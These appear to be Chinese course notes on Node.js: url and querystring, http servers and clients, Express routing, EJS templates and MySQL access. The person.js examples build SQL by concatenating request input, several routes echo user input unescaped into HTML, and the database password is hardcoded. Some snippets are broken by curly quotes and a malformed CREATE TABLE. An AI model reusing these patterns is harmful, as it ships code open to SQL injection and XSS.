// path: '//www.gongjuji.net/byte/?name=zhangsan',
// href: '//www.gongjuji.net/byte/?name=zhangsan#one' }
url.format(urlObj)
将json对象格式化成字符串。
var url=require('url');
var obj1={ protocol: 'http:',
slashes: true,
auth: null,
host: 'calc.gongjuji.net',
port: null,
hostname: 'calc.gongjuji.net',
hash: '#one#two',
search: '?name=zhangsan&age=18',
query: 'name=zhangsan&age=18',
pathname: '/byte/',
path: '/byte/?name=zhangsan&age=18',
href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two'
};
var url1=url.format(obj1);
console.log(url1);
//http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two
var url=require('url');
//请求参数为为json对象
var obj2={ protocol: 'http:',
slashes: true,
auth: null,
host: 'calc.gongjuji.net',
port: null,
hostname: 'calc.gongjuji.net',
hash: '#one#two',
search: '?name=zhangsan&age=18',
query: { name: 'zhangsan', age: '18' }, //页面参数部分,已经解析成对象了
pathname: '/byte/',
path: '/byte/?name=zhangsan&age=18',
href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two' };
var url2=url.format(obj2);
console.log(url2);
//http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two
var url=require('url');
//缺少参数的情况
var obj3={ protocol: null,
slashes: true,
auth: null,
host: 'www.gongjuji.net',
port: null,
hostname: 'www.gongjuji.net',
hash: '#one',
search: '?name=zhangsan',
query: { name: 'zhangsan' },
pathname: '/byte/',
path: '/byte/?name=zhangsan',
href: '//www.gongjuji.net/byte/?name=zhangsan#one' };
var url3=url.format(obj3);
console.log(url3);
//www.gongjuji.net/byte/?name=zhangsan#one
url.resolve(from, to)
为URL或href插入或替换原有的标签。
from:源地址;
to:需要添加或替换的标签。
var url=require('url');
//指定相对路径
var url1=url.resolve('http://www.gongjuji.net/one/two/three','four');
console.log(url1); //http://www.gongjuji.net/one/two/four
//指定根目录的相对路径
var url3=url.resolve('http://www.gongjuji.net/one/two/three','/four');
console.log(url3); //http://www.gongjuji.net/four
//带参数的相对路径
var url2=url.resolve('http://www.gongjuji.net/one/two/three?name=zhangsan','four');
console.log(url2); //http://www.gongjuji.net/one/two/four
//非标准分隔符的原路径
var url4=url.resolve('http://www.gongjuji.net\\one#name1','/four');
console.log(url4);//http://www.gongjuji.net/four
//非标准分隔符的相对路径
var url5=url.resolve('http://www.gongjuji.net/one','\\two\\three');
console.log(url5);//http://www.gongjuji.net/two/three
querystring模块
querystring模块提供了一些实用函数,用于解析与格式化 URL 查询字符串。
querystring模块的方法有四个:
querystring模块方法 说明
querystring.escape(str) 将一个字符转义成一个编码
querystring.unescape(str) 将一个编码反转义成一个字符
querystring.stringify(obj[, sep[, eq[, options]]]) 将一个对象序列化为一个查询的字符串,中间使用&= 分别为字符串中的分隔符和赋值符。其中,obj:要序列化成 URL 查询字符串的对象。sep:用于界定查询字符串中的键值对的子字符串,默认为&eq:用于界定查询字符串中的键与值的子字符串,默认为=optionsencodeURIComponent <Function> 把对象中的字符转换成查询字符串时使用的函数,默认为querystring.escape()
querystring.parse(str[, sep[, eq[, options]]]) 将一个查询的字符串反序列化为一个对象,也就是说它与querystring.stringify是起相反作用的关系
Chap4-17.js
var queryString=require("querystring");
var str=queryString.escape("哈哈");
console.log(str); //%E5%93%88%E5%93%88
console.log(queryString.unescape(str)); //哈哈
console.log(queryString.stringify({ foo: 'bar', baz: ['qux', 'quux'], corge: '' }));
// 返回 'foo=bar&baz=qux&baz=quux&corge='
console.log(queryString.stringify({ foo: 'bar', baz: 'qux' }, ';', ':'));
// 返回 'foo:bar;baz:qux'
console.log(queryString.parse('name=pkcms&author=zh&date='));
//{ name: 'pkcms', author: 'zh', date: '' }
console.log(queryString.parse('name=pkcms&author=zh&author=hhy&date='));
//相同的参数名会反序列化为一个数组,{ name: 'pkcms', author: [ 'zh', 'hhy' ], date: '' }
console.log(queryString.parse('name=pkcms,author=zh,date=',','));
//第2个参数是用来指明分隔符是用了哪个字符,{ name: 'pkcms', author: 'zh', date: '' }
console.log(queryString.parse('name:pkcms,author:zh,date:',',',':'));
//第3个参数是用来指明赋值符是用了哪个字符,{ name: 'pkcms', author: 'zh', date: '' }
HTTP服务器与客户端
Node.js 标准库提供了http模块,其中封装了一个高效的HTTP服务器和一个简易的HTTP客户端。http.Server是一个基于事件的HTTP服务器,http.request则是一个HTTP客户端工具,用于向HTTP服务器发起请求。
HTTP服务器
http.Serverhttp模块中的HTTP服务器对象,用Node.js做的所有基于HTTP协议的系统,如网站、社交应用甚至代理服务器,都是基于http.Server实现的。
http.Server是一个基于事件的HTTP服务器,所有的请求都被封装为独立的事件,开发者只需要对它的事件编写响应函数即可实现HTTP服务器的所有功能。它继承自EventEmitter,提供了以下几个事件:
• request:当客户端请求到来时,该事件被触发,提供两个参数reqres,分别是http.ServerRequesthttp.ServerResponse的实例,表示请求和响应信息。
• connection:当TCP连接建立时,该事件被触发,提供一个参数socket,为net.Socket的实例。connection事件的粒度要大于request,因为客户端在Keep-Alive模式下可能会在同一个连接内发送多次请求。
• close:当服务器关闭时,该事件被触发。注意不是在用户连接断开时。
在这些事件中, 最常用的就是request了, 因此http提供了一个捷径:http.createServer([requestListener]) , 功能是创建一个HTTP服务器并将requestListener作为 request 事件的监听函数。
Chap4-2.js
var http=require('http')
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
}).listen(3000);
Chap4-15.js
var http=require("http");
var server=new http.Server();
var count=0;
server.on("connection",function () {
console.log("someone connected!")
});
server.on("request",function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
});
server.on("close",function () {
console.log("server closed!")
});
server.listen(3000);
setTimeout(function () {
server.close();
},5000);
console.log("HTTP server is listening at port 3000.");
http.ServerRequest
http.ServerRequest是HTTP请求的信息,是后端开发者最关注的内容。它一般由http.Serverrequest事件发送,作为第一个参数传递,通常简称requestreq
HTTP请求一般可以分为两部分:请求头(Request Header)和请求体(Requset Body)
ServerRequest的属性 说明
complete 客户端请求是否已经发送完成
httpVersion HTTP协议版本,通常是 1.01.1
method HTTP请求方法,如 GETPOSTPUTDELETE
url 原始的请求路径,例如/static/image/x.jpg/user?name=byvoid
headers HTTP 请求头
trailers HTTP 请求尾(不常见)
connection 当前 HTTP 连接套接字,为 net.Socket 的实例
socket connection 属性的别名
client client 属性的别名
http.ServerRequest提供了以下3个事件用于控制请求体传输:
• data :当请求体数据到来时,该事件被触发。该事件提供一个参数 chunk,表示接收到的数据。如果该事件没有被监听,那么请求体将会被抛弃。该事件可能会被调用多次。
• end :当请求体数据传输完成时,该事件被触发,此后将不会再有数据到来。
• close: 用户当前请求结束时,该事件被触发。不同于 end,如果用户强制终止了传输,也还是调用close
获取 GET 请求内容
由于 GET 请求直接被嵌入在路径中,URL是完整的请求路径,包括了 ? 后面的部分,因此你可以手动解析后面的内容作为 GET请求的参数。Node.js 的 url 模块中的 parse 函数提供了这个功能。
var http=require("http");
var url=require("url");
http.createServer(function (req,res) {
console.log(url.parse(req.url));
}).listen(3000);
http://localhost:3000/chap4-16?name=zhangsan&password=123456
Url {
protocol: null,
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: '?name=zhangsan&password=123456',
query: 'name=zhangsan&password=123456',
pathname: '/chap4-16',
path: '/chap4-16?name=zhangsan&password=123456',
href: '/chap4-16?name=zhangsan&password=123456' }
Chap4-16.html
<form action="http://localhost:3000/myNode/chap4/chap4-16.js" method="get">
<span>用户名:</span><input type="text" name="user">
<span>密码:</span><input type="password" name="password">
<input type="submit" value="提交">
</form>
Chap4-16.js
var http=require("http");
var url=require("url");
var queryString=require("querystring");
http.createServer(function (req,res) {
//可替换部分开始
var query=url.parse(req.url).query;
console.log(query);
var params=queryString.parse(query);
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("用户名为:"+params.user);
res.end("密码为:"+params.password);
//可替换部分结束
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
可替换部分:
var query=url.parse(req.url,true).query;
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("用户名为:"+query.user);
res.end("密码为:"+query.password);
获取 POST 请求内容
POST 请求的内容全部都在请求体中。
http.ServerRequest 并没有一个属性内容为请求体,原因是等待请求体传输可能是一件耗时的工作,譬如上传文件。所以 Node.js 默认是不会解析请求体的,当你需要的时候,需要手动来做。
http.ServerResponse
http.ServerResponse 是返回给客户端的信息,决定了用户最终能看到的结果。作为第二个参数传递,一般简称为responseres
http.ServerResponse 有三个重要的成员函数,用于返回响应头、响应内容以及结束请求。
• response.writeHead(statusCode, [headers]):向请求的客户端发送响应头。statusCode 是 HTTP 状态码,如 200 (请求成功)、404 (未找到)等。headers是一个类似关联数组的对象,表示响应头的每个属性。该函数在一个请求内最多只能调用一次,如果不调用,则会自动生成一个响应头。
• response.write(data, [encoding]):向请求的客户端发送响应内容。data 是一个 Buffer 或字符串,表示要发送的内容。如果 data 是字符串,那么需要指定encoding 来说明它的编码方式,默认是 utf-8。在 response.end 调用之前,response.write 可以被多次调用。
• response.end([data], [encoding]):结束响应,告知客户端所有发送已经完成。当所有要返回的内容发送完毕的时候,该函数必须被调用一次。它接受两个可选参数,意义和 response.write 相同。如果不调用该函数,客户端将永远处于等待状态。
Chap4-18.html
<form action="http://localhost:3000/myNode/chap4/chap4-18.js" method=“post">
<span>用户名:</span><input type="text" name="user">
<span>密码:</span><input type="password" name="password">
<input type="submit" value="提交">
</form>
Chap4-18.js
var http=require("http");
var querystring=require("querystring");
var util=require("util");
http.createServer(function (req,res) {
var post="";
req.on("data",function (chunk) {
post+=chunk;
});
req.on("end",function () {
post=querystring.parse(post);
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("用户名为:"+post.user);
res.end("密码为:"+post.password);
});
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
HTTP 客户端
http模块提供了两个函数http.requesthttp.get,功能是作为客户端向 HTTP 服务器发起请求。
http.request(options, callback) 发起 HTTP 请求,并返回一个 http.ClientRequest 的实例。接受两个参数,option 是一个类似关联数组的对象,表示请求的参数,callback 是请求的回调函数。option常用的参数如下所示:
• host :请求网站的域名或 IP 地址。
• port :请求网站的端口,默认 80
• method :请求方法,默认是 GET
• path :请求的相对于根的路径,默认是/QueryString 应该包含在其中。例如 /search?query=byvoid
• headers :一个关联数组对象,为请求头的内容。
http.get(options, callback)http 模块还提供了一个更加简便的方法用于处理GET请求:http.get。它是 http.request 的简化版,唯一的区别在于http.get自动将请求方法设为了 GET 请求,同时不需要手动调用 req.end()
Chap4-19.js
var http=require('http');
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
//get 请求外网
var html='';
http.get('http://www.njfu.edu.cn',function(req1,res1){
req1.on('data',function(data){
html+=data;
});
req1.on('end',function(){
res.end(html);
});
});
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
Chap4-20.js
var http=require('http');
var querystring=require('querystring');
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
//发送 http Post 请求
var postData=querystring.stringify({
msg:'中文内容'
});
var options={
hostname:'www.njfu.edu.cn',
port:80,
path:'/',
method:'POST',
headers:{
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Content-Length':Buffer.byteLength(postData)
}
};
var html='';
var req1=http.request(options, function(res1) {
res1.setEncoding('utf-8');
res1.on('data',function(chun){
html+=chun;
});
res1.on('end',function(){
res.end(html);
});
});
req1.write(postData); // write data to request body
req1.end();
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
Express框架
• Express框架概述
• 路由
• 模板引擎
• 数据库集成
Express框架概述
Express 是一个简洁而灵活的 node.js Web应用框架, 提供了一系列强大特性帮助你创建各种 Web 应用,和丰富的 HTTP 工具。Express 作为开发框架,因为它是目前最稳定、使用最广泛,而且 Node.js 官方推荐的唯一一个 Web 开发框架。
使用 Express 可以快速地搭建一个完整功能的网站。Express 框架核心特性:
• 可以设置中间件来响应 HTTP 请求。
• 定义了路由表用于执行不同的 HTTP 请求动作。
• 可以通过向模板传递参数来动态渲染 HTML 页面。
准备工作
1. 安装Express:
npm install express -g //全局安装
npm install express-generator -g //安装全局变量
2. 初始化项目:
cd example //进入项目文件夹
express project //创建express目录,project是目录名
3. 执行如下命令:
cd project //进入项目根目录
npm install //安装依赖
最终目录:
express目录
• /bin:用来启动应用(服务器)
• node_modules:存放 package.json 中安装的模块,当你在 package.json 添加依赖的模块并安装后,存放在这
• /public:存放静态资源(image、css、js)目录
• /routes:路由用于确定应用程序如何响应对特定端点的客户机请求,包含一个 URI(或路径)和一个特定的 HTTP 请求方法(GET、POST 等)。每个路由可以具有一个或多个处理程序函数,这些函数在路由匹配时执行。
• /views:模板文件所在目录
• app.js程序:main文件,这个是服务器启动的入口
• package.json:存储着工程的信息及模块依赖,当在 dependencies 中添加依赖的模块时,运行 npm install
app.js节略
var createError = require('http-errors');
var express = require('express');
var path = require('path');
var cookieParser = require('cookie-parser');
var logger = require('morgan');
// 路由信息(接口地址),存放在routes的根目录
var indexRouter = require('./routes/index');
var usersRouter = require('./routes/users');
var app = express();
// 模板开始
app.set('views', path.join(__dirname, 'views'));
app.engine('.html', require('ejs').__express);
app.set('view engine', 'html');
//略
//配置路由,('自定义路径',上面设置的接口地址)
app.use('/', indexRouter);�app.use('/users', usersRouter);
安装ejs模块:npm install ejs
index.js
var express = require('express');
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
res.type("text/html");
res.render("home",{pic:"images/njfu.jpg"}); //重要
});
module.exports = router;
users.js
var express = require('express');
var router = express.Router();
/* GET users listing. */
router.get('/', function(req, res, next) {
res.type("text/html");
res.send('<h1>Welcome to Nanjing Forestry University</h1>');
});
module.exports = router;
home.html
<body class="HolyGrail">
<header>
<img src=<%=pic%> width="100%" height="200">
<!-- <%= pic %> 的标签,功能是显示引用的变量,即 res.render 函数第二个参数传入的对象的属性。-->
</header>
<div class="HolyGrail-body">
<div class="HolyGrail-nav">
<ul>
…
</ul>
</div>
<div class="HolyGrail-content">
<h1 style="text-indent: 20px">南林新闻</h1>
<ul>
…
</ul>
</div>
</div>
<footer>
<h5>版权所有 © 2003-2012 南京林业大学 保留所有权利 地址:南京市龙蟠路159号</h5>
</footer>
</body>
启动服务器:npm start
启动完成后终端将输出 node ./bin/www
在浏览器中访问 http://localhost:3000/http://localhost:3000/users
Express网站的架构
浏览器发起请求,由路由控制器接受,根据不同的路径定向到不同的控制器。控制器处理用户的具体请求,可能会访问数据库中的对象,即模型部分。控制器还要访问模板引擎,生成视图的 HTML,最后再由控制器返回给浏览器,完成一次请求。
Express网站的架构
路由
路由是指如何定义应用的端点(URIs)以及如何响应客户端的请求。
路由是由一个 URI、HTTP 请求(GET、POST等)和若干个句柄组成,它的结构如下:
router.METHOD(path, [callback...], callback)
• routerexpress.Router 对象的一个实例,Router 实例是一个完整的中间件和路由系统。
• METHOD 是一个 HTTP 请求方法,如GETPOST等。
• path 是服务器上的路径。
• callback 是当路由匹配时要执行的函数。
// GET method route
router.get('/', function (req, res) {
res.send('GET request to the homepage');
});
// POST method route
router.post('/', function (req, res) {
res.send('POST request to the homepage');
});
路由路径
路由路径和请求方法一起定义了请求的端点,它可以是字符串、字符串模式或者正则表达式。
// 匹配根路径的请求
router.get('/', function (req, res) {
res.send('root');
});
// 匹配 /about 路径的请求
router.get('/about', function (req, res) {
res.send('about');
});
// 匹配 /random.text 路径的请求
router.get('/random.text', function (req, res) {
res.send('random.text');
});
// 匹配 acd 和 abcd
router.get('/ab?cd', function(req, res) {
res.send('ab?cd');
});
// 匹配 abcd、abbcd、abbbcd等
router.get('/ab+cd', function(req, res) {
res.send('ab+cd');
});
// 匹配 abcd、abxcd、abRABDOMcd、ab123cd等
router.get('/ab*cd', function(req, res) {
res.send('ab*cd');
});
// 匹配 /abe 和 /abcde
router.get('/ab(cd)?e', function(req, res) {
res.send('ab(cd)?e');
});
路由句柄
可以为请求处理提供多个回调函数,其行为类似中间件。唯一的区别是这些回调函数有可能调用 next('route') 方法而略过其他路由回调函数。可以利用该机制为路由定义前提条件,如果在现有路径上继续执行没有意义,则可将控制权交给剩下的路径。
路由句柄有多种形式,可以是一个函数、一个函数数组,或者是两者混合。
app.js节略
// 路由信息(接口地址),存放在routes的根目录
var chap422Router = require('./routes/chap4-22');
//配置路由,('自定义路径',上面设置的接口地址)
app.use("/chap4-22",chap422Router);
chap4-22.js
var express = require('express');
var router = express.Router();
router.get('/a', function (req, res) {
res.type("text/html");
res.send('<h1>Hello from A!</h1>');
});
router.get('/b', function (req, res, next) {
console.log('response will be sent by the next function ...');
next();
}, function (req, res) {
res.type("text/html");
res.send('<h1>Hello from B!</h1>');
});
var cb0 = function (req, res, next) {
console.log('CB0');
next();
};
var cb1 = function (req, res, next) {
console.log('CB1');
next();
};
var cb2 = function (req, res) {
res.type("text/html");
res.send('<h1>Hello from C!</h1>');
};
router.get('/c', [cb0, cb1, cb2]);
router.get('/d', [cb0, cb1], function (req, res, next) {
console.log('response will be sent by the next function ...');
next();
}, function (req, res) {
res.type("text/html");
res.send('<h1>Hello from D!</h1>');
});
module.exports = router;
响应方法
响应对象(res)的方法向客户端返回响应,终结请求响应的循环。如果在路由句柄中一个方法也不调用,来自客户端的请求会一直挂起。
res.download(path [, filename] [, callback])方法使用res.sendfile()传输文件。
• path:所需传输文件的路径(绝对路径),通常情况下浏览器会弹出一个下载文件的窗口。
• filename:指定下载文件窗口中显示的默认文件名称。
app.js节略
app.get("/download",function (req, res) {
var q = req.query;
if (q.type == "jpg") {
res.download(__dirname + "/public/images/njfu.jpg", "南林.jpg");
} else if (q.type == "txt") {
res.download(__dirname + "/public/files/content.txt");
} else {
res.send("错误的请求");
}
});
res.end([data] [, encoding])方法终结响应处理流程。
res.json([body])方法发送一个json的响应。这个方法和将一个对象或者一个数组作为参数传递给res.send()方法的效果相同。
res.redirect([status,] path)方法发送重定向请求。
• status: {Number},表示要设置的HTTP状态码,如果不指定http状态码,使用默认的状态码302:"Found"
• path: {String},要设置到Location头中的URL
res.send([body])方法发送各种类型的响应。
res.render(view [, option] [, callback(err,html)])方法渲染视图模板(view),并将渲染后的HTML字符串发送到客户端。
• view:视图模板文件名,默认在views文件夹下面;
• option:对象,指定返回的数据;
• callback(err,html):回调函数,err返回错误信息,html返回渲染的HTML字符串。注意:如果指定了回调函数,则服务器端不会自动将HTML字符串发送到客户端,需要用res.send()方法发送。
app.js节略
// 路由信息(接口地址),存放在routes的根目录
var chap423Router = require('./routes/chap4-23');
//配置路由,('自定义路径',上面设置的接口地址)
app.use("/chap4-23",chap423Router);
chap4-23.js
var express = require('express');
var url = require('url');
var router = express.Router();
router.get('/redirect', function (req, res) {
res.redirect("/chap4-22/a");
});
router.get('/end', function (req, res) {
res.type("text/html");
res.end("<h1>终结响应处理流程</h1>");
});
router.get('/json', function (req, res) {
res.json({user:"Zhangsan",password:"123456"});
});
router.get('/render', function (req, res) {
var newpath=url.resolve(req.url,"/images/njfu.jpg");
res.render("home",{pic:newpath},function (err,html) {
if(err){
console.error(err);
}else{
res.send(html);
}
});
});
module.exports = router;
请求方法
request是浏览器给服务器的请求,一般用到的是两种方法:postget,两种方法都会指定路由。request提供了三种方法来获取参数和内容:request.paramsrequest.queryrequest.body
• request.body返回post方式传送的内容(名称数值对);
app.js节略
// 路由信息(接口地址),存放在routes的根目录
var chap426Router = require('./routes/chap4-26');
//ejs模板
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
//配置路由,('自定义路径',上面设置的接口地址)
app.use("/chap4-26",chap426Router);
chap4-26.js
var express = require('express');
var router = express.Router();
router.get('/', function(req, res, next) {
res.render('chap4-26');
});
router.post('/add', function (req, res) {
res.type("text/html");
res.write('<h1>姓名:'+req.body.name+'</h1>');
res.write('<h1>年龄:'+req.body.age+'</h1>');
res.end('<h1>职业:'+req.body.professional+'</h1>');
});
module.exports = router;
chap4-26.ejs
<div>
<form action="/chap4-26/add" method="post">
姓名:<input type="text" name="name">
年龄:<input type="text" name="age">
职业:<input type="text" name="professional">
<input type="submit" value="post提交">
</form>
</div>
• request.query返回get方式传送的内容,即获取URL中?后的名称数值对;
chap4-26.ejs
<div>
<form action="/chap4-26/add1" method="get">
姓名:<input type="text" name="name1">
年龄:<input type="text" name="age1">
职业:<input type="text" name="professional1">
<input type="submit" value="get提交">
</form>
</div>
chap4-26.js
router.get('/add1', function (req, res) {
res.type("text/html");
res.write('<h1>姓名:'+req.query.name1+'</h1>');
res.write('<h1>年龄:'+req.query.age1+'</h1>');
res.end('<h1>职业:'+req.query.professional1+'</h1>');
});
• request.params返回从express路由器获取的参数。
chap4-26.ejs
<div>
<a href="/chap4-26/Update/zhangsan">修改</a>
</div>
chap4-26.js
router.get('/Update/:name', function (req, res) {
res.type("text/html");
res.send('<h1>姓名:'+req.params.name+'</h1>');
});
模板引擎
模板引擎(Template Engine)是一个从页面模板根据一定的规则生成 HTML 的工具。在 MVC 架构中,模板引擎包含在服务器端。控制器得到用户请求后,从模型获取数据,调用模板引擎。模板引擎以数据和页面模板为输入,生成 HTML 页面,然后返回给控制器,由控制器交回客户端。
模板引擎
基于 JavaScript 的模板引擎有许多种实现,我们推荐使用 ejs(Embedded JavaScript),因为它十分简单,而且与 Express 集成良好。由于它是标准 JavaScript 实现的,因此它不仅可以运行在服务器端,还可以运行在浏览器中。
在 app.js 中通过以下两个语句设置了模板引擎和页面模板的位置:
app.js节略
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
ejs 的标签系统非常简单,它只有以下3种标签。
• <% code %>:JavaScript 代码。
• <%= code %>:显示替换过 HTML 特殊字符的内容。
• <%- code %>:显示原始 HTML 内容。
chap4-24.ejs
<h1><%=title%></h1>
<p>Welcome to <%=title%></p>
chap4-24.js
var express = require('express');
var router = express.Router();
router.use("/",function (req, res, next) {
res.render("chap4-24",{title:"Express"});
});
module.exports = router;
app.js节略
// 路由信息(接口地址),存放在routes的根目录
var chap425Router = require('./routes/chap4-25');
// 模板开始
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
//配置路由,('自定义路径',上面设置的接口地址)
app.use("/chap4-25",chap425Router);
chap4-25.ejs
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>EJS模板</title>
<link rel="stylesheet" href="/stylesheets/chap4-25.css"/>
</head>
<body>
<h1>EJS模板引擎</h1>
<p>这是很简单的一个小流程就不在一一的标注流程了,注释的很清楚了</p>
<p>这里是姓名: <span><%= name %></span></p>
<p>这里是性别: <span><%= sex %></span></p>
<p>这里是性别: <span><%= content %></span></p>
</body>
</html>
chap4-25.css
h1{ text-align: center;}
p{ font-size:20px;}
span{ font-size:25px; color: red;}
chap4-25.js
var express = require('express');
var router = express.Router();
var data={
name : 'webarn',
sex : '男',
content : '参数,可以更改'
};
router.use("/",function (req, res, next) {
res.render("chap4-25",data);
});
module.exports = router;
集成数据库
为 Express 应用添加连接数据库的能力,只需要加载相应数据库的 Node.js 驱动即可。
MySQL模块:npm install mysql
MySQL环境准备
安装MySQL时配置参数:
• 服务器名:localhost(默认)
• 用户名:root
• 密码:0923
安装结束后,打开MySQL Workbench,选择要连接的服务器(localhost),在当前服务器中新建数据库(例如,educationdb),在当前数据库中用create table语句新建表格(例如:person),并添加数据。
-- ----------------------------
-- Table structure for person
-- ----------------------------
CREATE TABLE `person` (
`id` int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,
`name` varchar(255) DEFAULT NULL,
`age` int(11) DEFAULT NULL,
`professional` varchar(255) DEFAULT NULL,
)
-- ----------------------------
-- Records of person
-- ----------------------------
INSERT INTO `person` VALUES ('1', '武大', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('2', '王二', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('3', '张三', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('4', '李四', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('5', '孙五', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('6', '钱六', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('7', '赵七', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('8', '刘八', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('9', '张九', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('10', '郑十', '25', '计算机科学与技术');
连接
mysql模块是一个实现了MySQL协议的Node.js JavaScript客户端,通过这个模块可以与MySQL数据库建立连接、执行查询等操作。
建立连接可以使用createConnection()方法创建连接对象,再使用connect()建立连接。
var mysql = require('mysql');
var connection = mysql.createConnection({
host: 'localhost',
user: 'root',
password: '0923',
database: 'educationdb'
});
//可替换部分开始
connection.connect(function(err) {
if (err) {
return console.error('连接错误: ' + err.stack);
}
console.log('连接ID ' + connection.threadId);
});
//可替换部分结束
建立连接也可以隐式的由查询自动创建:
可替换部分:
connection.query('SELECT * from person', function(err, rows) {
// 如果没有错误,则会连接成功!
});
在创建连接时,需要传入一些选项。可传入的选项参数如下:
• host-连接主机名(默认为localhost
• port-连接端口号(默认为3306
• user-MySql连接用户名
• password-MySql连接密码
• database-要连接的数据库
• connectTimeout-连接超时时间(默认10000毫秒)
关闭数据库连接可以使用两种方法。
• 通过end()方法,在执行结束后关闭连接:
connection.end(function(err) {
// The connection is terminated now
});
• 使用destroy()方法,这个方法会立即关闭连接套接字,且这个方法没有回调函数:
connection.destroy();
连接池
数据库连接是一种有限的,能够显著影响到整个应用程序的伸缩性和健壮性的资源,在多用户的网页应用程序中体现得尤为突出。
数据库连接池正是针对这个问题提出来的,它会负责分配、管理和释放数据库连接:允许应用程序重复使用一个现有的数据库连接,而不是重新建立一个连接;释放空闲时间超过最大允许空闲时间的数据库连接,从而避免因为连接未释放而引起的数据库连接遗漏。
数据库连接池能明显提高对数据库操作的性能。
连接池连接时通过createPool()方法可以使用连接池连接。
当使用完连接池,要关闭所有连接,可以使用end()方法关闭连接池中的所有连接:
pool.end(function (err) {
// all connections in the pool have ended
});
通过getConnection()方法连接可以共享一个连接,或管理多个连接。
连接使用完后通过调用connection.release()方法可以将连接返回到连接池中,这个连接可以被其它人重复使用。
connection.release()方法并不会将连接从连接池中移除,如果需要关闭连接且从连接池中移除,可以使用connection.destroy()
db.js
// 数据库包
var mysql = require(‘mysql’);
var pool = mysql.createPool({
host: ‘localhost’,
user: ‘root’,
password: ‘0923’,
database: ‘educationdb’
});
function query(sql, callback) {
pool.getConnection(function (err, connection) {
// Use the connection
connection.query(sql, function (err, rows) {
callback(err, rows);
connection.release();//释放连接
});
});
}
exports.query = query;
执行SQL语句
对数据库的操作都是通过SQL语句实现的,通过SQL语句可以实现创建数据库、创建表、及对表中数据库的增/删/改/查等操作。
执行查询:在node-mysql中,通过ConnectionPool实例的query()执行SQL语句,所执行的SQL语句可以是一个SELECT查询或是其它数据库操作。query()方法有以下三种形式:
• connection.query(sqlString, function(err,results,fields))
• sqlString:要执行的SQL语句;
• results:为查询结果;
• fields:包含查询结果的字段信息。
connection.query('SELECT * FROM `books` WHERE `author` = "David"', function (error, results, fields){});
• connection.query(sqlString, values, function(err,results,fields))
• values:数组,表示要应用到查询占位符的值:
connection.query('SELECT * FROM `books` WHERE `author` = ?', ['David'], function (error, results, fields){});
var post = {id: 1, title: 'Hello MySQL'};
var query = connection.query('INSERT INTO posts SET ?', post, function(err, result) {
//...
});
console.log(query.sql); // INSERT INTO posts SET `id` = 1, `title` = 'Hello MySQL‘
//标识符也可以使用??标识符占位符
var userId = 1;
var columns = ['username', 'email'];
var query = connection.query('SELECT ?? FROM ?? WHERE id = ?', [columns, 'users', userId], function(err, results) {
// ...
});
console.log(query.sql); // SELECT `username`, `email` FROM `users` WHERE id = 1
• connection.query(options, function(err,results,fields))
• options:对象,表示查询选项参数
connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ?',
values: ['David']
}, function (error, results, fields) {});
• 当使用参数占位符时,第二种和第三种形式也可以结合使用。如:
connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ?',
}, ['David'], function (error, results, fields) {});
app.js节略
// 路由信息(接口地址),存放在routes的根目录
var persons = require('./routes/person');
//ejs模板
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
//配置路由,('自定义路径',上面设置的接口地址)
app.use("/persons",persons);
person.js
var express = require('express');
var router = express.Router();
var db = require("./db.js"); //引入数据库包
router.get('/', function (req, res, next) {
db.query('select * from person', function (err, rows) {
if (err) {
res.render('persons', {title: '人员管理', datas: []});
} else {
res.render('persons', {title: '人员管理', datas: rows});
}
})
});
//删除
router.get('/del/:id', function (req, res) {
var id = req.params.id;
db.query("delete from person where id=" + id, function (err, rows) {
if (err) {
res.end('删除失败:' + err)
} else {
res.redirect('/persons')
}
});
});
//新增
router.get('/add', function (req, res) {
res.render('add');
});
router.post('/add', function (req, res) {
var name = req.body.name;
var age = req.body.age;
var professional = req.body.professional;
db.query("insert into person(name,age,professional) values('" + name + "'," + age + ",'" + professional + "')", function (err, rows) {
if (err) {
res.end('新增失败:' + err);
} else {
res.redirect('/persons');
}
})
});
//修改
router.get(‘/toUpdate/:id’, function (req, res) {
var id = req.params.id;
db.query(“select * from person where id=” + id, function (err, rows) {
if (err) {
res.end(‘修改页面跳转失败:’ + err);
} else {
res.render(“update”, {datas: rows}); //直接跳转
}
});
});
router.post('/update', function (req, res) {
var id = req.body.id;
var name = req.body.name;
var age = req.body.age;
var professional = req.body.professional;
